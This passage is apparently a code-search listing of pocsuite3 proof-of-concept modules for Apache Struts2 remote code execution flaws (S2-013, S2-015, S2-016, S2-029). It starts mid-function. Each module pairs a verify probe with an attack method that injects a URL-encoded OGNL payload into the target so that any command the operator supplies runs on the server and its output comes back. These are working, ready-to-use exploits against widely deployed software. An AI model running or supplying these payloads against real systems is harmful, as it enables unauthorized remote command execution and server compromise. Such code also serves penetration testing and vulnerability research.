    probe_url = self.url + template.replace("RECOMMAND", "echo " + marker)
    result = {}
    try:
        resp = requests.get(probe_url, headers=HEADERS)
        if resp and resp.status_code == 200 and marker in resp.text:
            result['VerifyInfo'] = {'URL': probe_url}
    except Exception:
        # ReadTimeout and any other failure alike: leave result empty.
        pass
    return self.parse_output(result)
def parse_output(self, result):
Source : struts2_013_rce.py
with GNU General Public License v3.0
from 78778443
def _attack(self):
    """Run the ``command`` option on the target through the S2-013 ``${...}`` parameter primitive.

    The command replaces ``RECOMMAND`` in the OGNL carried by ``?233=``;
    the whole 200 response body (which includes the ``dbapp=`` prefix the
    payload writes) is returned in ``result['Stdout']``.  Request errors are
    swallowed (best effort).

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    HEADERS = {
        'Accept': 'application/x-shockwave-flash,image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    template = ('?233=%24%7B%23_memberAccess%5B"allowStaticMetho'
                'dAccess"%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime()'
                '.exec(%27RECOMMAND%27).getInputStream()%2C%23b%3Dnew%20java.io.'
                'InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%'
                '23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%'
                '3D%40org.apache.struts2.ServletActionContext%40getResponse().ge'
                'tWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.Str'
                'ing(%23d))%2C%23out.close()%7D')
    attack_url = self.url + template.replace("RECOMMAND", self.get_option("command"))
    result = {}
    try:
        resp = requests.get(attack_url, headers=HEADERS)
        if resp and resp.status_code == 200:
            result['Stdout'] = resp.text
    except Exception:
        # ReadTimeout and any other failure alike: leave result empty.
        pass
    return self.parse_output(result)
register_poc(DemoPOC)  # hand DemoPOC to the framework loader (register_poc comes from pocsuite3.api)
Source : struts2_015_rce.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Probe for S2-015 by running ``echo VuLnEcHoPoCSuCCeSS`` through an OGNL action name.

    The expression is placed in the action name (``/${...}.action``); the
    command's stdout is reflected in the resulting 404 error page, so a hit
    is a 404 whose body contains the marker.  ``if response`` cannot be used
    here because a 404 ``Response`` is falsy.  Request errors are swallowed
    (best effort).

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    HEADERS = {
        'Accept': 'application/x-shockwave-flash,image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    marker = "VuLnEcHoPoCSuCCeSS"
    # In vulmap this payload is hard-coded to run `id`; the output shows up
    # in the 404 page.  Here the command is substituted for RECOMMAND.
    template = (r"/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAcces"
                r"s.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberA"
                r"ccess, true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('RECOMMAND').getInp"
                r"utStream())}.action")
    probe_url = self.url + template.replace("RECOMMAND", "echo " + marker)
    result = {}
    try:
        resp = requests.get(probe_url, headers=HEADERS)
        # Deliberately no `if resp` guard: the expected reply is a 404.
        if resp.status_code == 404 and marker in resp.text:
            result['VerifyInfo'] = {'URL': probe_url}
    except Exception:
        # ReadTimeout and any other failure alike: leave result empty.
        pass
    return self.parse_output(result)
def parse_output(self, result):
Source : struts2_015_rce.py
with GNU General Public License v3.0
from 78778443
def _attack(self):
    """Run the ``command`` option on the target through the S2-015 action-name primitive and scrape its output.

    The command replaces ``RECOMMAND`` inside ``/${...}.action``.  The
    output comes back inside the 404 error page, so the reply is parsed only
    when ``status_code == 404`` (a 404 ``Response`` is falsy, hence no
    ``if response`` guard): the ``Message`` paragraph is pulled out with a
    regex, URL-decoded and stored in ``result['Stdout']``.  Request and
    decode errors are swallowed (best effort).

    NOTE(review): the regex reads `` < p> < b>Message < /b>`` with spaces
    inside the tags, which looks like a rendering artefact of this page
    rather than the real HTML; check it against the upstream file.

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    HEADERS = {
        'Accept': 'application/x-shockwave-flash,image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    # In vulmap this payload is hard-coded to run `id`; the output shows up
    # in the 404 page.  Here the command is substituted for RECOMMAND.
    template = (r"/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAcces"
                r"s.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberA"
                r"ccess, true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('RECOMMAND').getInp"
                r"utStream())}.action")
    attack_url = self.url + template.replace("RECOMMAND", self.get_option("command"))
    result = {}
    try:
        resp = requests.get(attack_url, headers=HEADERS)
        # Deliberately no `if resp` guard: the expected reply is a 404.
        if resp.status_code == 404:
            page = resp.content.decode('utf-8')
            found = re.findall(r" < p> < b>Message < /b>(.*?) < /p>", page)
            result['Stdout'] = parse.unquote(str(found))
    except Exception:
        # ReadTimeout and any other failure alike: leave result empty.
        pass
    return self.parse_output(result)
register_poc(DemoPOC)  # hand DemoPOC to the framework loader (register_poc comes from pocsuite3.api)
Source : struts2_016_rce.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Probe for S2-016 by running ``echo VuLnEcHoPoCSuCCeSS`` through a ``redirect:`` prefix.

    The OGNL in ``?redirect:${...}`` splits the command on whitespace,
    starts it with ``ProcessBuilder`` and prints its stdout into the
    response.  A 200 reply containing the marker stores the probe URL in
    ``result['VerifyInfo']['URL']``.  Request errors are swallowed (best
    effort).

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    HEADERS = {
        'Accept': 'application/x-shockwave-flash,image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    marker = "VuLnEcHoPoCSuCCeSS"
    # Raw strings: the `\\s` / `\\A` below must reach the server as written.
    template = (r"?redirect:${%23req%3d%23context.get(%27co%27"
                r"%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atc"
                r"her.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java"
                r".util.Scanner((new%20java.lang.ProcessBuilder(%27RECOMMAND%27."
                r"toString().split(%27\\s%27))).start().getInputStream()).useDel"
                r"imiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,"
                r"%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony"
                r".xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes"
                r"%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),"
                r"%23resp.getWriter().println(%23str),%23resp.getWriter().flush"
                r"(),%23resp.getWriter().close()}")
    probe_url = self.url + template.replace("RECOMMAND", "echo " + marker)
    result = {}
    try:
        resp = requests.get(probe_url, headers=HEADERS)
        if resp and resp.status_code == 200 and marker in resp.text:
            result['VerifyInfo'] = {'URL': probe_url}
    except Exception:
        # ReadTimeout and any other failure alike: leave result empty.
        pass
    return self.parse_output(result)
def parse_output(self, result):
Source : struts2_016_rce.py
with GNU General Public License v3.0
from 78778443
def _attack(self):
    """Run the ``command`` option on the target through the S2-016 ``redirect:`` primitive.

    The command replaces ``RECOMMAND`` and is split on whitespace by the
    payload before ``ProcessBuilder`` starts it, so shell syntax (pipes,
    quoting) is not interpreted.  The whole 200 response body is returned in
    ``result['Stdout']``.  Request errors are swallowed (best effort).

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    HEADERS = {
        'Accept': 'application/x-shockwave-flash,image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    # Raw strings: the `\\s` / `\\A` below must reach the server as written.
    template = (r"?redirect:${%23req%3d%23context.get(%27co%27"
                r"%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atc"
                r"her.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java"
                r".util.Scanner((new%20java.lang.ProcessBuilder(%27RECOMMAND%27."
                r"toString().split(%27\\s%27))).start().getInputStream()).useDel"
                r"imiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,"
                r"%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony"
                r".xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes"
                r"%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),"
                r"%23resp.getWriter().println(%23str),%23resp.getWriter().flush"
                r"(),%23resp.getWriter().close()}")
    attack_url = self.url + template.replace("RECOMMAND", self.get_option("command"))
    result = {}
    try:
        resp = requests.get(attack_url, headers=HEADERS)
        if resp and resp.status_code == 200:
            result['Stdout'] = resp.text
    except Exception:
        # ReadTimeout and any other failure alike: leave result empty.
        pass
    return self.parse_output(result)
register_poc(DemoPOC)  # hand DemoPOC to the framework loader (register_poc comes from pocsuite3.api)
Source : struts2_029_rce.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Probe for S2-029 by running ``echo VuLnEcHoPoCSuCCeSS`` through an OGNL expression appended to the URL.

    The expression is concatenated straight onto ``self.url`` (so the base
    URL is expected to end where the OGNL should start), relaxes every
    ``_memberAccess`` restriction and returns the command's stdout.  A 200
    reply containing the marker stores the probe URL in
    ``result['VerifyInfo']['URL']``.  Request errors are swallowed (best
    effort).

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    HEADERS = {
        'Accept': 'application/x-shockwave-flash,image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    marker = "VuLnEcHoPoCSuCCeSS"
    template = (r"(%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtected"
                r"Access%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperti"
                r"es%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAcce"
                r"ss[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,@org.a"
                r"pache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27RECOMMAND%27).getInputStream"
                r"()))")
    probe_url = self.url + template.replace("RECOMMAND", "echo " + marker)
    result = {}
    try:
        resp = requests.get(probe_url, headers=HEADERS)
        if resp and resp.status_code == 200 and marker in resp.text:
            result['VerifyInfo'] = {'URL': probe_url}
    except Exception:
        # ReadTimeout and any other failure alike: leave result empty.
        pass
    return self.parse_output(result)
def parse_output(self, result):
Source : struts2_029_rce.py
with GNU General Public License v3.0
from 78778443
def _attack(self):
    """Run the ``command`` option on the target through the S2-029 OGNL primitive.

    The command replaces ``RECOMMAND`` in the expression appended to
    ``self.url``; the whole 200 response body is returned in
    ``result['Stdout']``.  Request errors are swallowed (best effort).

    Returns:
        Whatever ``self.parse_output(result)`` produces.
    """
    HEADERS = {
        'Accept': 'application/x-shockwave-flash,image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/vnd.ms-powerpoint,application/msword,*/*',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    template = (r"(%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtected"
                r"Access%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperti"
                r"es%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAcce"
                r"ss[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,@org.a"
                r"pache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27RECOMMAND%27).getInputStream"
                r"()))")
    attack_url = self.url + template.replace("RECOMMAND", self.get_option("command"))
    result = {}
    try:
        resp = requests.get(attack_url, headers=HEADERS)
        if resp and resp.status_code == 200:
            result['Stdout'] = resp.text
    except Exception:
        # ReadTimeout and any other failure alike: leave result empty.
        pass
    return self.parse_output(result)
register_poc(DemoPOC)  # hand DemoPOC to the framework loader (register_poc comes from pocsuite3.api)